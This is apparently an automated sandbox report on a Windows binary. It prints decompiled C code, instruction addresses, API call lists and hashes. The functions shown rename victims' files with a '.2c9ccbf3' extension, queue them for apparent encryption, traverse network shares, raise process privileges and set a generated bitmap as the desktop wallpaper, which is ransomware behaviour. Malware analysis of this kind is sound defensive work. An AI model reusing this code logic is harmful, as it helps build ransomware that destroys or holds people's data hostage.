														_v116 = _t217 * _t268 * ((_v122 & 0x0000ffff) + 7 >> 3);
														_v152 = 0x4d42;
														_v142 = 0x36;
														_v150 = 0x36 + _v116;
														_v146 = 0;
														_v144 = 0;
														_v72 =  *0x40f86c(_v24,  &_v136, 0,  &_v76, 0, 0);
														if(_v72 != 0) {
															SelectObject(_v28, _v72);
															_push(0xcc0020);
															_push(0);
															_push(0);
															_push(_v24);
															_push(_v128);
															_push(_v132);
															_push(0);
															_push(0);
															_push(_v28);
															if( *0x40f858() != 0) {
																 *0x40f8b8(0, _v56, 0x23, 0);
																E00401A3A(_v56);
																_t263 = _v56;
																wcscat(_t263, 0x40f5fe);
																_t232 = _t263 + wcslen(_t263) * 2;
																 *_t232 = 0x42002e;
																 *((intOrPtr*)(_t232 + 4)) = 0x50004d;
																 *((short*)(_t232 + 8)) = 0;
																_v8 = CreateFileW(_v56, 0x40000000, 0, 0, 4, 0x80, 0);
																if(_v8 != 0xffffffff) {
																	if(WriteFile(_v8,  &_v152, 0xe,  &_v16, 0) != 0) {
																		if(WriteFile(_v8,  &_v136, 0x28,  &_v16, 0) != 0) {
																			if(WriteFile(_v8, _v76, _v116,  &_v16, 0) != 0) {
																				NtClose(_v8);
																				_v8 = 0;
																				_v32 = E00401D08(0x40d009);
																				_v36 = E00401D08(0x40d039);
																				_v40 = E00401D08(0x40d051);
																				if(E00403303( *0x40f5ea,  &_v684) != 0) {
																					E00401A3A( &_v684);
																					wcscat( &_v684, _v32);
																					if(RegCreateKeyExW(0x80000003,  &_v684, 0, 0, 0, 0x20106, 0,  &_v12, 0) == 0) {
																						if(RegSetValueExW(_v12, _v36, 0, 1, _v56, 2 + wcslen(_v56) * 2) == 0) {
																							_t280 =  &_v164;
																							 *_t280 = 0x300031;
																							_t280[1] = 0;
																							_t259 = RegSetValueExW(_v12, _v40, 0, 1, _t280, 2 + wcslen(_t280) * 2);
																							if(_t259 == 0) {
																								_t259 = SystemParametersInfoW(0x14, 0, _v56, 3);
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				if(_v40 != 0) {
					_t259 = RtlFreeHeap( *0x40f5d6, 0, _v40);
				}
				if(_v36 != 0) {
					_t259 = RtlFreeHeap( *0x40f5d6, 0, _v36);
				}
				if(_v32 != 0) {
					_t259 = RtlFreeHeap( *0x40f5d6, 0, _v32);
				}
				if(_v12 != 0) {
					_t259 = NtClose(_v12);
				}
				if(_v8 != 0 && _v8 != 0xffffffff) {
					_t259 = NtClose(_v8);
				}
				if(_v72 != 0) {
					_t259 = DeleteObject(_v72);
				}
				if(_v68 != 0) {
					_t259 = DeleteObject(_v68);
				}
				if(_v56 != 0) {
					_t259 = RtlFreeHeap( *0x40f5d6, 0, _v56);
				}
				if(_v52 != 0) {
					_t259 = DeleteObject(_v52);
				}
				if(_v28 != 0) {
					_t259 = DeleteDC(_v28);
				}
				if(_v24 != 0) {
					_t259 = DeleteDC(_v24);
				}
				if(_v20 != 0) {
					return  *0x40f830(0, _v20);
				}
				return _t259;
			}











































                                                                                        0x004033c7
                                                                                        0x004033ce
                                                                                        0x004033d5
                                                                                        0x004033dc
                                                                                        0x004033e3
                                                                                        0x004033ea
                                                                                        0x004033f1
                                                                                        0x004033f8
                                                                                        0x004033ff
                                                                                        0x00403406
                                                                                        0x0040340d
                                                                                        0x00403414
                                                                                        0x00403423
                                                                                        0x0040342a
                                                                                        0x0040343a
                                                                                        0x00403441
                                                                                        0x00403451
                                                                                        0x00403458
                                                                                        0x00403470
                                                                                        0x00403484
                                                                                        0x00403487
                                                                                        0x0040348d
                                                                                        0x00403493
                                                                                        0x0040349a
                                                                                        0x004034df
                                                                                        0x004034e6
                                                                                        0x004034fb
                                                                                        0x00403515
                                                                                        0x0040351c
                                                                                        0x0040352a
                                                                                        0x0040352c
                                                                                        0x00403536
                                                                                        0x00403540
                                                                                        0x0040354a
                                                                                        0x00403554
                                                                                        0x00403554
                                                                                        0x00403572
                                                                                        0x00403587
                                                                                        0x0040359d
                                                                                        0x004035a4
                                                                                        0x004035b9
                                                                                        0x004035c6
                                                                                        0x004035cf
                                                                                        0x004035da
                                                                                        0x004035e6
                                                                                        0x004035ef
                                                                                        0x004035f5
                                                                                        0x00403608
                                                                                        0x0040360e
                                                                                        0x00403614
                                                                                        0x0040362f
                                                                                        0x00403641
                                                                                        0x0040364a
                                                                                        0x00403654
                                                                                        0x0040365a
                                                                                        0x00403661
                                                                                        0x00403664
                                                                                        0x00403667
                                                                                        0x0040366a
                                                                                        0x0040366d
                                                                                        0x00403681
                                                                                        0x00403684
                                                                                        0x00403692
                                                                                        0x0040369b
                                                                                        0x004036a1
                                                                                        0x004036aa
                                                                                        0x004036cd
                                                                                        0x004036d4
                                                                                        0x004036e1
                                                                                        0x004036e7
                                                                                        0x004036ec
                                                                                        0x004036ee
                                                                                        0x004036f0
                                                                                        0x004036f3
                                                                                        0x004036f6
                                                                                        0x004036f9
                                                                                        0x004036fb
                                                                                        0x004036fd
                                                                                        0x00403708
                                                                                        0x00403718
                                                                                        0x00403721
                                                                                        0x00403726
                                                                                        0x00403734
                                                                                        0x00403747
                                                                                        0x0040374a
                                                                                        0x00403750
                                                                                        0x00403757
                                                                                        0x00403778
                                                                                        0x0040377f
                                                                                        0x004037a0
                                                                                        0x004037c1
                                                                                        0x004037df
                                                                                        0x004037e9
                                                                                        0x004037ef
                                                                                        0x00403800
                                                                                        0x0040380d
                                                                                        0x0040381a
                                                                                        0x00403831
                                                                                        0x0040383f
                                                                                        0x0040384e
                                                                                        0x0040387e
                                                                                        0x004038ad
                                                                                        0x004038b1
                                                                                        0x004038b7
                                                                                        0x004038bd
                                                                                        0x004038e1
                                                                                        0x004038e9
                                                                                        0x004038f6
                                                                                        0x004038f6
                                                                                        0x004038e9
                                                                                        0x004038ad
                                                                                        0x0040387e
                                                                                        0x00403831
                                                                                        0x004037df
                                                                                        0x004037c1
                                                                                        0x004037a0
                                                                                        0x0040377f
                                                                                        0x00403708
                                                                                        0x004036d4
                                                                                        0x0040362f
                                                                                        0x004035b9
                                                                                        0x004035a4
                                                                                        0x00403587
                                                                                        0x0040351c
                                                                                        0x004034fb
                                                                                        0x004034e6
                                                                                        0x00403458
                                                                                        0x00403441
                                                                                        0x00403900
                                                                                        0x0040390d
                                                                                        0x0040390d
                                                                                        0x00403917
                                                                                        0x00403924
                                                                                        0x00403924
                                                                                        0x0040392e
                                                                                        0x0040393b
                                                                                        0x0040393b
                                                                                        0x00403945
                                                                                        0x0040394a
                                                                                        0x0040394a
                                                                                        0x00403954
                                                                                        0x0040395f
                                                                                        0x0040395f
                                                                                        0x00403969
                                                                                        0x0040396e
                                                                                        0x0040396e
                                                                                        0x00403978
                                                                                        0x0040397d
                                                                                        0x0040397d
                                                                                        0x00403987
                                                                                        0x00403994
                                                                                        0x00403994
                                                                                        0x0040399e
                                                                                        0x004039a3
                                                                                        0x004039a3
                                                                                        0x004039ad
                                                                                        0x004039b2
                                                                                        0x004039b2
                                                                                        0x004039bc
                                                                                        0x004039c1
                                                                                        0x004039c1
                                                                                        0x004039cb
                                                                                        0x00000000
                                                                                        0x004039d2
                                                                                        0x004039e0

                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040390D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403924
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040393B
                                                                                        • NtClose.NTDLL(00000000), ref: 0040394A
                                                                                        • NtClose.NTDLL(000000FF), ref: 0040395F
                                                                                        • DeleteObject.GDI32(00000000), ref: 0040396E
                                                                                        • DeleteObject.GDI32(00000000), ref: 0040397D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403994
                                                                                        • DeleteObject.GDI32(00000000), ref: 004039A3
                                                                                        • DeleteDC.GDI32(00000000), ref: 004039B2
                                                                                        • DeleteDC.GDI32(00000000), ref: 004039C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Delete$FreeHeap$Object$Close
                                                                                        • String ID: ($.2c9ccbf3$BM
                                                                                        • API String ID: 2191992596-3314121166
                                                                                        • Opcode ID: 1d5de879dda802f6a9ee81b5fad0ed478d03724a460d7234c1951c06fe82c685
                                                                                        • Instruction ID: f98b427fced668d8329bf44421bf58694601528c6b1d165154df31b2355271e3
                                                                                        • Opcode Fuzzy Hash: 1d5de879dda802f6a9ee81b5fad0ed478d03724a460d7234c1951c06fe82c685
                                                                                        • Instruction Fuzzy Hash: 4C020771900208EFEB21AFA0ED09BAEBFB9FB04706F104076F501B61E1D7B55A59DB19
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00408BD6, Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 231memorynativethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E00408BD6(wchar_t* _a4) {
				long _v8;
				void* _v12;
				char _v16;
				char _v26;
				long _v44;
				signed int _t80;
				void* _t82;
				intOrPtr* _t83;
				wchar_t* _t85;
				signed int _t88;
				void* _t89;
				wchar_t* _t94;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				wchar_t* _t109;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t117;
				intOrPtr* _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				long* _t124;
				void* _t127;
				wchar_t* _t129;
				wchar_t* _t130;
				wchar_t* _t131;
				void* _t132;
				void* _t133;
				short* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t138;

				 *0x40f6bc(0x80000001,  &_v16);
				E00402160();
				_v8 = 0;
				_t80 = wcslen(_a4);
				_t136 = _t135 + 4;
				_t82 = RtlAllocateHeap( *0x40f5d6, 8, 0xa + _t80 * 2);
				_v12 = _t82;
				if(_v12 != 0) {
					_t83 =  &_v44;
					 *_t83 = 0x6f0056;
					 *((intOrPtr*)(_t83 + 4)) = 0x75006c;
					 *((intOrPtr*)(_t83 + 8)) = 0x65006d;
					 *((intOrPtr*)(_t83 + 0xc)) = 0x7b;
					_t85 = wcsstr(_a4,  &_v44);
					_t137 = _t136 + 8;
					_t129 = _t85;
					__eflags = _t129;
					if(_t129 == 0) {
						wcscpy(_v12, _a4);
						_t138 = _t137 + 8;
						E00401A67(_v12);
						while(1) {
							L8:
							_t88 = GetFileAttributesW(_v12);
							__eflags = _t88 - 0xffffffff;
							if(_t88 == 0xffffffff) {
								break;
							}
							__eflags = _t88 & 0x00000010;
							if((_t88 & 0x00000010) != 0) {
								_t89 = PathIsNetworkPathW(_v12);
								__eflags = _t89;
								if(_t89 == 0) {
									L50:
									__eflags =  *0x40f5a2;
									if(__eflags != 0) {
										E004039E3(__eflags, ".2c9ccbf3");
									}
									return E00407D2C(_v8, _v12);
								}
								__eflags = _v12 - 0x5c005c;
								if(_v12 != 0x5c005c) {
									goto L50;
								}
								_t94 = RtlAllocateHeap( *0x40f5d6, 8, 0x1a + wcslen(_v12) * 2);
								_t130 = _t94;
								__eflags = _t130;
								if(_t130 != 0) {
									 *_t130 = 0x5c005c;
									_t130[1] = 0x5c003f;
									_t130[2] = 0x4e0055;
									_t130[3] = 0x5c0043;
									wcscat(_t130, _v12 + 4);
									RtlFreeHeap( *0x40f5d6, 0, _v12);
									_v12 = _t130;
									__eflags =  *0x40f5e6;
									if( *0x40f5e6 == 0) {
										__eflags =  *0x40f5ea;
										if( *0x40f5ea != 0) {
											_t101 =  *0x40f5ea; // 0x0
											_v8 = _t101;
										}
									} else {
										_t102 =  *0x40f5e6; // 0x0
										_v8 = _t102;
									}
									while(1) {
										_t99 = E0040303D(_v8, _v12);
										__eflags = _t99;
										if(_t99 != 0) {
											break;
										}
										_t100 = E004030A1(_v12);
										__eflags = _t100;
										if(_t100 == 0) {
											return _t100;
										}
									}
									_t73 =  &_v12;
									 *_t73 = _v12 + 8;
									__eflags =  *_t73;
									goto L50;
								}
								return _t94;
							}
							_t134 = PathFindExtensionW(_v12);
							__eflags =  *_t134;
							if( *_t134 == 0) {
								L20:
								_t104 = PathIsNetworkPathW(_v12);
								__eflags = _t104;
								if(_t104 == 0) {
									L33:
									__eflags =  *0x40f5a2;
									if(__eflags != 0) {
										E004039E3(__eflags, ".2c9ccbf3");
									}
									return E00407D2C(_v8, _v12);
								}
								_t109 = RtlAllocateHeap( *0x40f5d6, 8, 0x1a + wcslen(_v12) * 2);
								_t131 = _t109;
								__eflags = _t131;
								if(_t131 != 0) {
									 *_t131 = 0x5c005c;
									_t131[1] = 0x5c003f;
									_t131[2] = 0x4e0055;
									_t131[3] = 0x5c0043;
									wcscat(_t131, _v12 + 4);
									RtlFreeHeap( *0x40f5d6, 0, _v12);
									_v12 = _t131;
									__eflags =  *0x40f5e6;
									if( *0x40f5e6 == 0) {
										__eflags =  *0x40f5ea;
										if( *0x40f5ea != 0) {
											_t116 =  *0x40f5ea; // 0x0
											_v8 = _t116;
										}
									} else {
										_t117 =  *0x40f5e6; // 0x0
										_v8 = _t117;
									}
									while(1) {
										_t114 = E0040303D(_v8, _v12);
										__eflags = _t114;
										if(_t114 != 0) {
											break;
										}
										_t115 = E004030A1(_v12);
										__eflags = _t115;
										if(_t115 == 0) {
											return _t115;
										}
									}
									_t52 =  &_v12;
									 *_t52 = _v12 + 8;
									__eflags =  *_t52;
									goto L33;
								}
								return _t109;
							}
							_t118 =  &_v26;
							 *_t118 = 0x6c002e;
							 *((intOrPtr*)(_t118 + 4)) = 0x6b006e;
							 *((short*)(_t118 + 8)) = 0;
							_t119 =  *0x40f694(_t134, _t118);
							_t138 = _t138 + 8;
							__eflags = _t119;
							if(_t119 != 0) {
								goto L20;
							}
							_t120 = E00403BB0(_v12);
							_t132 = _t120;
							__eflags = _t132;
							if(_t132 != 0) {
								RtlFreeHeap( *0x40f5d6, 0, _v12);
								_v12 = _t132;
								continue;
							}
							return _t120;
						}
						_t122 = PathIsUNCServerW(_v12);
						__eflags = _t122;
						if(_t122 != 0) {
							__eflags =  *0x40f5a2;
							if(__eflags != 0) {
								E004039E3(__eflags, ".2c9ccbf3");
							}
							_t122 = E00407B27(_v12);
						}
						return _t122;
					}
					_t124 = _v12;
					 *_t124 = 0x5c005c;
					_t124[1] = 0x5c003f;
					wcscat(_v12, _t129);
					_t138 = _t137 + 8;
					E00401A3A(_v12);
					_t127 = E00406B24(_v12);
					_t133 = _t127;
					__eflags = _t133;
					if(_t133 != 0) {
						RtlFreeHeap( *0x40f5d6, 0, _v12);
						_v12 = _t133;
						goto L8;
					}
					return _t127;
				}
				return _t82;
			}









































                                                                                        0x00408be5
                                                                                        0x00408beb
                                                                                        0x00408bf0
                                                                                        0x00408bfa
                                                                                        0x00408c00
                                                                                        0x00408c13
                                                                                        0x00408c19
                                                                                        0x00408c20
                                                                                        0x00408c27
                                                                                        0x00408c2a
                                                                                        0x00408c30
                                                                                        0x00408c37
                                                                                        0x00408c3e
                                                                                        0x00408c4c
                                                                                        0x00408c52
                                                                                        0x00408c55
                                                                                        0x00408c57
                                                                                        0x00408c59
                                                                                        0x00408cb1
                                                                                        0x00408cb7
                                                                                        0x00408cbd
                                                                                        0x00408cc2
                                                                                        0x00408cc2
                                                                                        0x00408cc5
                                                                                        0x00408ccb
                                                                                        0x00408cce
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408cfd
                                                                                        0x00408d02
                                                                                        0x00408e60
                                                                                        0x00408e66
                                                                                        0x00408e68
                                                                                        0x00408f37
                                                                                        0x00408f37
                                                                                        0x00408f3e
                                                                                        0x00408f45
                                                                                        0x00408f45
                                                                                        0x00000000
                                                                                        0x00408f50
                                                                                        0x00408e6e
                                                                                        0x00408e75
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408e97
                                                                                        0x00408e9d
                                                                                        0x00408e9f
                                                                                        0x00408ea1
                                                                                        0x00408ea8
                                                                                        0x00408eae
                                                                                        0x00408eb5
                                                                                        0x00408ebc
                                                                                        0x00408ecb
                                                                                        0x00408edf
                                                                                        0x00408ee5
                                                                                        0x00408ee8
                                                                                        0x00408eef
                                                                                        0x00408efb
                                                                                        0x00408f02
                                                                                        0x00408f04
                                                                                        0x00408f09
                                                                                        0x00408f09
                                                                                        0x00408ef1
                                                                                        0x00408ef1
                                                                                        0x00408ef6
                                                                                        0x00408ef6
                                                                                        0x00408f0c
                                                                                        0x00408f12
                                                                                        0x00408f17
                                                                                        0x00408f19
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408f22
                                                                                        0x00408f27
                                                                                        0x00408f29
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408f2b
                                                                                        0x00408f33
                                                                                        0x00408f33
                                                                                        0x00408f33
                                                                                        0x00000000
                                                                                        0x00408f33
                                                                                        0x00000000
                                                                                        0x00408ea1
                                                                                        0x00408d11
                                                                                        0x00408d13
                                                                                        0x00408d17
                                                                                        0x00408d6a
                                                                                        0x00408d6d
                                                                                        0x00408d73
                                                                                        0x00408d75
                                                                                        0x00408e3a
                                                                                        0x00408e3a
                                                                                        0x00408e41
                                                                                        0x00408e48
                                                                                        0x00408e48
                                                                                        0x00000000
                                                                                        0x00408e53
                                                                                        0x00408d97
                                                                                        0x00408d9d
                                                                                        0x00408d9f
                                                                                        0x00408da1
                                                                                        0x00408da8
                                                                                        0x00408dae
                                                                                        0x00408db5
                                                                                        0x00408dbc
                                                                                        0x00408dcb
                                                                                        0x00408ddf
                                                                                        0x00408de5
                                                                                        0x00408de8
                                                                                        0x00408def
                                                                                        0x00408dfb
                                                                                        0x00408e02
                                                                                        0x00408e04
                                                                                        0x00408e09
                                                                                        0x00408e09
                                                                                        0x00408df1
                                                                                        0x00408df1
                                                                                        0x00408df6
                                                                                        0x00408df6
                                                                                        0x00408e0c
                                                                                        0x00408e12
                                                                                        0x00408e17
                                                                                        0x00408e19
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408e22
                                                                                        0x00408e27
                                                                                        0x00408e29
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408e2b
                                                                                        0x00408e36
                                                                                        0x00408e36
                                                                                        0x00408e36
                                                                                        0x00000000
                                                                                        0x00408e36
                                                                                        0x00000000
                                                                                        0x00408da1
                                                                                        0x00408d19
                                                                                        0x00408d1c
                                                                                        0x00408d22
                                                                                        0x00408d29
                                                                                        0x00408d31
                                                                                        0x00408d37
                                                                                        0x00408d3a
                                                                                        0x00408d3c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408d41
                                                                                        0x00408d46
                                                                                        0x00408d48
                                                                                        0x00408d4a
                                                                                        0x00408d5c
                                                                                        0x00408d62
                                                                                        0x00000000
                                                                                        0x00408d62
                                                                                        0x00000000
                                                                                        0x00408d4a
                                                                                        0x00408cd3
                                                                                        0x00408cd9
                                                                                        0x00408cdb
                                                                                        0x00408cdd
                                                                                        0x00408ce4
                                                                                        0x00408ceb
                                                                                        0x00408ceb
                                                                                        0x00408cf3
                                                                                        0x00408cf3
                                                                                        0x00000000
                                                                                        0x00408cdb
                                                                                        0x00408c5b
                                                                                        0x00408c5e
                                                                                        0x00408c64
                                                                                        0x00408c6f
                                                                                        0x00408c75
                                                                                        0x00408c7b
                                                                                        0x00408c83
                                                                                        0x00408c88
                                                                                        0x00408c8a
                                                                                        0x00408c8c
                                                                                        0x00408ca0
                                                                                        0x00408ca6
                                                                                        0x00000000
                                                                                        0x00408ca9
                                                                                        0x00000000
                                                                                        0x00408c8c
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • NtSetThreadExecutionState.NTDLL(80000001,?), ref: 00408BE5
                                                                                          • Part of subcall function 00402160: NtOpenProcessToken.NTDLL(000000FF,00000028,0040905C), ref: 00402173
                                                                                          • Part of subcall function 00402160: NtQueryInformationToken.NTDLL(0040905C,00000003,?,00000004,?), ref: 00402190
                                                                                          • Part of subcall function 00402160: RtlAllocateHeap.NTDLL(00000008,?), ref: 004021A1
                                                                                          • Part of subcall function 00402160: NtQueryInformationToken.NTDLL(0040905C,00000003,00000000,?,?), ref: 004021BF
                                                                                          • Part of subcall function 00402160: NtAdjustPrivilegesToken.NTDLL(0040905C,00000000,00000000,00000000,00000000,00000000), ref: 004021F2
                                                                                          • Part of subcall function 00402160: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402203
                                                                                          • Part of subcall function 00402160: NtClose.NTDLL(0040905C), ref: 0040220C
                                                                                        • wcslen.NTDLL ref: 00408BFA
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00408C13
                                                                                        • wcsstr.NTDLL ref: 00408C4C
                                                                                        • wcscat.NTDLL ref: 00408C6F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Token$Heap$AllocateInformationQuery$AdjustCloseExecutionFreeOpenPrivilegesProcessStateThreadwcscatwcslenwcsstr
                                                                                        • String ID: .2c9ccbf3$?$C$U$\
                                                                                        • API String ID: 3053807181-3748697195
                                                                                        • Opcode ID: 078ebafd70b42fcacea6869c3e9a1d14b17f30670e346fc792a3d5901da94a1c
                                                                                        • Instruction ID: 06576c32b97e3fdf99f41b85b7d7e25d8334b109ddc247418aeea4ccdaf4cb49
                                                                                        • Opcode Fuzzy Hash: 078ebafd70b42fcacea6869c3e9a1d14b17f30670e346fc792a3d5901da94a1c
                                                                                        • Instruction Fuzzy Hash: 36A16D70500209EFDB219FA0DE48B9D7FB5BF04305F10407AE945B62B1DB798A99DB1D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405E35, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 199memorynativefileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 98%
                                                                                        			E00405E35(wchar_t* _a4, intOrPtr _a8, long _a12, char _a16) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __edx;
				int _t72;
				void* _t91;
				void* _t105;
				void* _t115;
				long _t117;
				signed int _t121;
				long _t122;

				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				if(_a12 != 0 || _a8 != 0) {
					_t72 = wcslen(_a4);
					_t7 =  &_a16; // 0x406937
					_t121 = _t72 + wcslen( *_t7);
					_t122 = 0x16 + _t121 * 2;
					_v16 = RtlAllocateHeap( *0x40f5d6, 8, 4 + _t121 * 2);
					if(_v16 != 0) {
						_t14 =  &_a16; // 0x406937
						wcscpy(_v16,  *_t14);
						E00401A3A(_v16);
						wcscat(_v16, _a4);
						if(E00405C1C(_v16) == 0) {
							_v20 = RtlAllocateHeap( *0x40f5d6, 8, _t122);
							if(_v20 != 0) {
								wcscpy(_v20, _v16);
								wcscat(_v20, ".2c9ccbf3");
								MoveFileExW(_v16, _v20, 8);
								_v12 = CreateFileW(_v20, 0xc0000000, 0, 0, 3, 0xca000000, 0);
								if(_v12 != 0xffffffff) {
									if(CreateIoCompletionPort(_v12,  *0x40f9e8, 0, 0) != 0) {
										_t115 = RtlAllocateHeap( *0x40f5d6, 8, 0x80104);
										if(_t115 != 0) {
											 *(_t115 + 0x30) = 0;
											 *((intOrPtr*)(_t115 + 0x2c)) = _v12;
											if( *0x40f590 != 1) {
												if( *0x40f590 != 2) {
													 *((intOrPtr*)(_t115 + 0x28)) = 1;
													 *((intOrPtr*)(_t115 + 0x24)) = 1;
													_t117 = _a12;
													_t91 = E0040611D(_t117);
													asm("adc edx, 0x0");
													 *(_t115 + 0x1c) = _t91 + 0x80000;
													 *(_t115 + 0x20) = _t117;
												} else {
													 *((intOrPtr*)(_t115 + 0x28)) = 1;
													 *((intOrPtr*)(_t115 + 0x24)) = 1;
													 *(_t115 + 0x1c) = 0xffffffff;
													 *(_t115 + 0x20) = 0xffffffff;
												}
											} else {
												 *((intOrPtr*)(_t115 + 0x28)) = 1;
												 *((intOrPtr*)(_t115 + 0x24)) = 1;
												 *(_t115 + 0x1c) = 0x80000;
												 *(_t115 + 0x20) = 0;
											}
											 *(_t115 + 0xbc) =  *(_t115 + 0x1c);
											 *(_t115 + 0xc0) =  *(_t115 + 0x20);
											 *((intOrPtr*)(_t115 + 0xb4)) = _a8;
											 *(_t115 + 0xb8) = _a12;
											_t58 = _t115 + 0x34; // 0x34
											E00404A52(_t58);
											_t59 = _t115 + 0x34; // 0x34
											_t60 = _t115 + 0x74; // 0x74
											memcpy(_t60, _t59, 0x40);
											_t62 = _t115 + 0x74; // 0x74
											E0040511B(_t62, 0x40f470, 0x40f4f0);
											_t63 = _t115 + 0x74; // 0x74
											_t105 = E00401060(_t63, 0x80, 0);
											_t64 = _t115 + 0xf4; // 0xf4
											memcpy(_t64, _t105, 0x10);
											if(PostQueuedCompletionStatus( *0x40f9e8, 0, 0, _t115) != 0) {
												InterlockedIncrement(0x40f9ec);
												_v8 = 1;
											} else {
												RtlFreeHeap( *0x40f5d6, 0, _t115);
												NtClose(_v12);
											}
										} else {
											NtClose(_v12);
										}
									} else {
										NtClose(_v12);
									}
								}
							}
						}
					}
				}
				if(_v16 != 0) {
					RtlFreeHeap( *0x40f5d6, 0, _v16);
				}
				if(_v20 != 0) {
					RtlFreeHeap( *0x40f5d6, 0, _v20);
				}
				return _v8;
			}















                                                                                        0x00405e40
                                                                                        0x00405e47
                                                                                        0x00405e4e
                                                                                        0x00405e59
                                                                                        0x00405e68
                                                                                        0x00405e73
                                                                                        0x00405e7f
                                                                                        0x00405e88
                                                                                        0x00405e9e
                                                                                        0x00405ea5
                                                                                        0x00405eab
                                                                                        0x00405eb1
                                                                                        0x00405ebd
                                                                                        0x00405ec8
                                                                                        0x00405edb
                                                                                        0x00405ef0
                                                                                        0x00405ef7
                                                                                        0x00405f03
                                                                                        0x00405f14
                                                                                        0x00405f25
                                                                                        0x00405f46
                                                                                        0x00405f4d
                                                                                        0x00405f69
                                                                                        0x00405f8c
                                                                                        0x00405f90
                                                                                        0x00405fa0
                                                                                        0x00405faa
                                                                                        0x00405fb4
                                                                                        0x00405fdb
                                                                                        0x00405ffb
                                                                                        0x00406002
                                                                                        0x0040600c
                                                                                        0x0040600f
                                                                                        0x00406019
                                                                                        0x0040601c
                                                                                        0x0040601f
                                                                                        0x00405fdd
                                                                                        0x00405fdd
                                                                                        0x00405fe4
                                                                                        0x00405feb
                                                                                        0x00405ff2
                                                                                        0x00405ff2
                                                                                        0x00405fb6
                                                                                        0x00405fb6
                                                                                        0x00405fbd
                                                                                        0x00405fc4
                                                                                        0x00405fcb
                                                                                        0x00405fcb
                                                                                        0x00406028
                                                                                        0x0040602e
                                                                                        0x0040603a
                                                                                        0x00406040
                                                                                        0x00406046
                                                                                        0x0040604a
                                                                                        0x00406051
                                                                                        0x00406055
                                                                                        0x00406059
                                                                                        0x00406072
                                                                                        0x00406076
                                                                                        0x00406082
                                                                                        0x00406086
                                                                                        0x0040608e
                                                                                        0x00406095
                                                                                        0x004060b3
                                                                                        0x004060d4
                                                                                        0x004060da
                                                                                        0x004060b5
                                                                                        0x004060be
                                                                                        0x004060c7
                                                                                        0x004060c7
                                                                                        0x00405f92
                                                                                        0x00405f95
                                                                                        0x00405f95
                                                                                        0x00405f6b
                                                                                        0x00405f6e
                                                                                        0x00405f6e
                                                                                        0x00405f69
                                                                                        0x00405f4d
                                                                                        0x00405ef7
                                                                                        0x00405edb
                                                                                        0x00405ea5
                                                                                        0x004060e5
                                                                                        0x004060f2
                                                                                        0x004060f2
                                                                                        0x004060fc
                                                                                        0x00406109
                                                                                        0x00406109
                                                                                        0x0040611a

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 00405E68
                                                                                        • wcslen.NTDLL ref: 00405E76
                                                                                        • RtlAllocateHeap.NTDLL(00000008), ref: 00405E98
                                                                                        • wcscpy.NTDLL ref: 00405EB1
                                                                                        • wcscat.NTDLL ref: 00405EC8
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00405EEA
                                                                                        • wcscpy.NTDLL ref: 00405F03
                                                                                        • wcscat.NTDLL ref: 00405F14
                                                                                        • MoveFileExW.KERNEL32(00000000,00000000,00000008), ref: 00405F25
                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,CA000000,00000000), ref: 00405F40
                                                                                        • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000), ref: 00405F61
                                                                                        • NtClose.NTDLL(000000FF), ref: 00405F6E
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00080104), ref: 00405F86
